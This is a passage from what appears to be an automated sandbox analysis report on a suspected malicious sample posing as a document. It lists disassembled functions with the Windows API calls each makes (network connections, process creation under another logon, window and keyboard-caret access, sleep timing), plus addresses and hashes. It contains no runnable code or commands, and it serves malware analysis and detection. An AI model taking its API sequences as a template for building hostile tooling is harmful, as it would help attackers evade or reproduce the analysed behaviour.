                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 625478ed78a08903bbc6f8824a65ed8400eb6f27c75a47a57f2a21eef11181c1
                                                        • Instruction ID: 7da9b0a886f9f527e76381cd254ed4305a983a8abe082dc69431a67751e50775
                                                        • Opcode Fuzzy Hash: 625478ed78a08903bbc6f8824a65ed8400eb6f27c75a47a57f2a21eef11181c1
                                                        • Instruction Fuzzy Hash: 6531CF31A00266EFDF219F74CC49BAA7BA6FF41310F158529E821871A1E738EC51EB90
                                                        Function 00777AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00777AB6
                                                          • Part of subcall function 007569C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 007569E3
                                                          • Part of subcall function 007569C9: GetCurrentThreadId.KERNEL32 ref: 007569EA
                                                          • Part of subcall function 007569C9: AttachThreadInput.USER32(00000000,?,00758127), ref: 007569F1
                                                        • GetCaretPos.USER32(?), ref: 00777AC7
                                                        • ClientToScreen.USER32(00000000,?), ref: 00777B00
                                                        • GetForegroundWindow.USER32 ref: 00777B06
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: 0587964b9b6474fc78de46e8fb5aa8bac144aabe7247acce835cb163ae80a516
                                                        • Instruction ID: ca0c7937c11b1d3340da90fc9251bea0a8888eddde38be8f854a790b830affed
                                                        • Opcode Fuzzy Hash: 0587964b9b6474fc78de46e8fb5aa8bac144aabe7247acce835cb163ae80a516
                                                        • Instruction Fuzzy Hash: 1031FE71D00118AFDB10EFB5D8859EFBBF9EF58314B10846AE815E7211D679AE058BA0
                                                        Function 0076497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007649B7
                                                          • Part of subcall function 00764A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00764A60
                                                          • Part of subcall function 00764A41: InternetCloseHandle.WININET(00000000), ref: 00764AFD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 1463438336-0
                                                        • Opcode ID: 53c5622e8e9bf4cca789c1051c3a52a1c603bd248ac4d9b912662dd93b891d50
                                                        • Instruction ID: ca8b0d841d829900534ee5e3102e48a58d209a873f5d0bd9f61c78fc58eea52c
                                                        • Opcode Fuzzy Hash: 53c5622e8e9bf4cca789c1051c3a52a1c603bd248ac4d9b912662dd93b891d50
                                                        • Instruction Fuzzy Hash: EA21A431240B05BFDB129FA0CC04FBBBBA9FB48711F14801AFE0796550EB799811A794
                                                        Function 0074BC90 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0074BCD9
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0074BCE0
                                                        • CloseHandle.KERNEL32(00000004), ref: 0074BCFA
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0074BD29
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 2621361867-0
                                                        • Opcode ID: 2d09e987f443cb591e43bbc450f3ccb61f5038913a275e30cb662de800aca25f
                                                        • Instruction ID: 3e1a5e5554f7c4de6ce38f98f2181ce32bae2b93ded46735b70a33c567602620
                                                        • Opcode Fuzzy Hash: 2d09e987f443cb591e43bbc450f3ccb61f5038913a275e30cb662de800aca25f
                                                        • Instruction Fuzzy Hash: C2214D7250120DEBDF119FA8ED89BEE7BA9EF08314F048065FA01A6160C77ADD61DB60
                                                        Function 00778834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 007788A3
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007788BD
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007788CB
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007788D9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$AttributesLayered
                                                        • String ID:
                                                        • API String ID: 2169480361-0
                                                        • Opcode ID: ee4958145a48bb05ba31788c341cc5f41ea139cd8233dd928856e6ed45fb9c15
                                                        • Instruction ID: 08dd569b923ad11868c930e9d4d2d97b8b5335fdf28fcf19e334d529274bf67b
                                                        • Opcode Fuzzy Hash: ee4958145a48bb05ba31788c341cc5f41ea139cd8233dd928856e6ed45fb9c15
                                                        • Instruction Fuzzy Hash: A011AF31395110AFDF14AB28DC09FBA77A9EF89360F048119F91AC72E1CB78AD41C796
                                                        Function 0076900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0076906D
                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0076907F
                                                        • accept.WS2_32(00000000,00000000,00000000), ref: 0076908C
                                                        • WSAGetLastError.WS2_32(00000000), ref: 007690A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastacceptselect
                                                        • String ID:
                                                        • API String ID: 385091864-0
                                                        • Opcode ID: aa4f025fc9d68d1e865356a9bd84c4d3218a1baf61fa414b0704964d32aa28f0
                                                        • Instruction ID: e47940808c3dc8fe6cd9e401fed7939edc31b5d998b3b957a258760613063b66
                                                        • Opcode Fuzzy Hash: aa4f025fc9d68d1e865356a9bd84c4d3218a1baf61fa414b0704964d32aa28f0
                                                        • Instruction Fuzzy Hash: 3A215771500124AFC720DF69D845A9A7BFCEF49710F00816AF949D7291D678DE41CFA0
                                                        Function 007518E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00752CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007518FD,?,?,?,007526BC,00000000,000000EF,00000119,?,?), ref: 00752CB9
                                                          • Part of subcall function 00752CAA: lstrcpyW.KERNEL32(00000000,?,?,007518FD,?,?,?,007526BC,00000000,000000EF,00000119,?,?,00000000), ref: 00752CDF
                                                          • Part of subcall function 00752CAA: lstrcmpiW.KERNEL32(00000000,?,007518FD,?,?,?,007526BC,00000000,000000EF,00000119,?,?), ref: 00752D10
                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007526BC,00000000,000000EF,00000119,?,?,00000000), ref: 00751916
                                                        • lstrcpyW.KERNEL32(00000000,?,?,007526BC,00000000,000000EF,00000119,?,?,00000000), ref: 0075193C
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,007526BC,00000000,000000EF,00000119,?,?,00000000), ref: 00751970
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        • Opcode ID: da12ec30330ed4864f0711c16594a0354551cdd4ef84337705c8a439aca62048
                                                        • Instruction ID: e3bffe67f320404a05572c8f225bb1f968e720b06608c0284424feb52406ee85
                                                        • Opcode Fuzzy Hash: da12ec30330ed4864f0711c16594a0354551cdd4ef84337705c8a439aca62048
                                                        • Instruction Fuzzy Hash: FA110636100345EFDB219F34C859EBA77B8FF45351B80802AF806CB251EB75A84587A0
                                                        Function 00743D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00743D65
                                                          • Part of subcall function 007345EC: __FF_MSGBANNER.LIBCMT ref: 00734603
                                                          • Part of subcall function 007345EC: __NMSG_WRITE.LIBCMT ref: 0073460A
                                                          • Part of subcall function 007345EC: RtlAllocateHeap.NTDLL(01760000,00000000,00000001), ref: 0073462F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: 28f784663aa93e8fa55060732c15e67db809940b79688bd0da387012da8a7537
                                                        • Instruction ID: 6e723a3f5f224d383fdf9b32f67bcff27b6854897eae3ecba18c8ce3946991dc
                                                        • Opcode Fuzzy Hash: 28f784663aa93e8fa55060732c15e67db809940b79688bd0da387012da8a7537
                                                        • Instruction Fuzzy Hash: 61117332E05711EBEB353F74AC497AA3B98AF00361F108526F94D9A193DF3C9E418A95
                                                        Function 0075713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 0075715C
                                                        • _memset.LIBCMT ref: 0075717D
                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007571CF
                                                        • CloseHandle.KERNEL32(00000000), ref: 007571D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                        • String ID:
                                                        • API String ID: 1157408455-0
                                                        • Opcode ID: fa0a4979291ab12de4cca4587f13061b4a92f4e6d25f573731eda3b2fffe3d83
                                                        • Instruction ID: e1be11d7dde23af581ef969e6b728cb21516fbdff501252465dcca4a00a47bef
                                                        • Opcode Fuzzy Hash: fa0a4979291ab12de4cca4587f13061b4a92f4e6d25f573731eda3b2fffe3d83
                                                        • Instruction Fuzzy Hash: 2F11CA7290122C7AE7305B65AC4DFEBBA7CEF45760F10419AF904E71D0D2744E84CBA8
                                                        Function 007513D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007513EE
                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00751409
                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0075141F
                                                        • FreeLibrary.KERNEL32(?), ref: 00751474
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                        • String ID:
                                                        • API String ID: 3137044355-0
                                                        • Opcode ID: 2f90579c7fcddc1e68b0a2b79ad636fa199ec190e5771edc54c0004b26912205
                                                        • Instruction ID: 4e68de9f04b66a55aa5e7d10b2a9401a5fab416b9e539afbc434c57002673d45
                                                        • Opcode Fuzzy Hash: 2f90579c7fcddc1e68b0a2b79ad636fa199ec190e5771edc54c0004b26912205
                                                        • Instruction Fuzzy Hash: D721A271500249EBEB209F90DC88BDABBB8EF00747F40886AA91297410D7B8E949DF51
                                                        Function 007692C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0075AEA5,?,?,00000000,00000008), ref: 0072F282
                                                          • Part of subcall function 0072F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0075AEA5,?,?,00000000,00000008), ref: 0072F2A6
                                                        • gethostbyname.WS2_32(?), ref: 007692F0
                                                        • WSAGetLastError.WS2_32(00000000), ref: 007692FB
                                                        • _memmove.LIBCMT ref: 00769328
                                                        • inet_ntoa.WS2_32(?), ref: 00769333
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 1504782959-0
                                                        • Opcode ID: 932b4b2a4bfbe39bcbb78f1a3166a07dd45ee2c97f706fb962f66a9168e251bc
                                                        • Instruction ID: c367410420b830a97c3704ce481483ae1c48f3bbfaf81ff2aeb9376f468bb5fc
                                                        • Opcode Fuzzy Hash: 932b4b2a4bfbe39bcbb78f1a3166a07dd45ee2c97f706fb962f66a9168e251bc
                                                        • Instruction Fuzzy Hash: 66114C76500109EFCB14EFA4CD5ACEE77B9AF483117108025F506A72A2DB38EE04CBA1
                                                        Function 0074C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0074C285
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0074C297
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0074C2AD
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0074C2C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: b1ef17862e45c2153ff5ab287a0181243c1a702c9e14405122c45a19b006976d
                                                        • Instruction ID: 5ddb4c699ca8def4bd512126dafcc6cc6db056437a2cd536b3433d7b9fb72e5d
                                                        • Opcode Fuzzy Hash: b1ef17862e45c2153ff5ab287a0181243c1a702c9e14405122c45a19b006976d
                                                        • Instruction Fuzzy Hash: 9B11187A941218FFDB11DFD8C885E9DBBB4FB08750F204091EA04B7294D7B1AE10DB94
                                                        Function 00757C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00757C6C
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00757C9F
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00757CB5
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00757CBC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 2880819207-0
                                                        • Opcode ID: dcbb413007674b22e5a5e08fd5ab650a874b1e5dcb6b6c5ea85d6c64ff5193af
                                                        • Instruction ID: c184ad39b3ad40c9f79d65224c8b91876596d1cd4b50ae994e8916758d57498f
                                                        • Opcode Fuzzy Hash: dcbb413007674b22e5a5e08fd5ab650a874b1e5dcb6b6c5ea85d6c64ff5193af
                                                        • Instruction Fuzzy Hash: 1E112B72A05248BFD7519FACEC08AEA7FBD9B04325F148216F925D3291D6BC8D08C775
                                                        Function 0072C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0072C657
                                                        • GetStockObject.GDI32(00000011), ref: 0072C66B
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0072C675
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateMessageObjectSendStockWindow
                                                        • String ID:
                                                        • API String ID: 3970641297-0
                                                        • Opcode ID: eaeba0646df780670558588c4779085d676ad99a3c655b257ffd6b9879c58950
                                                        • Instruction ID: 0c484d2ec497bd0837b7d26c148118fd739e297a5de20258e250c5962ff80ae2
                                                        • Opcode Fuzzy Hash: eaeba0646df780670558588c4779085d676ad99a3c655b257ffd6b9879c58950
                                                        • Instruction Fuzzy Hash: F411C072501659BFDF128FA0EC45EEEBB69FF183A4F054212FA0452020C73ADC60EBA4
                                                        Function 007549D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0075354D,?,007545D5,?,00008000), ref: 007549EE
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0075354D,?,007545D5,?,00008000), ref: 00754A13
